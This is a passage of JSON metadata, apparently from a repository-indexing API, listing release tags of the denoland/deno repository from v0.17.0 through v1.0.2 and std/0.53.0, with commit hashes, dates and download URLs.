enoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fden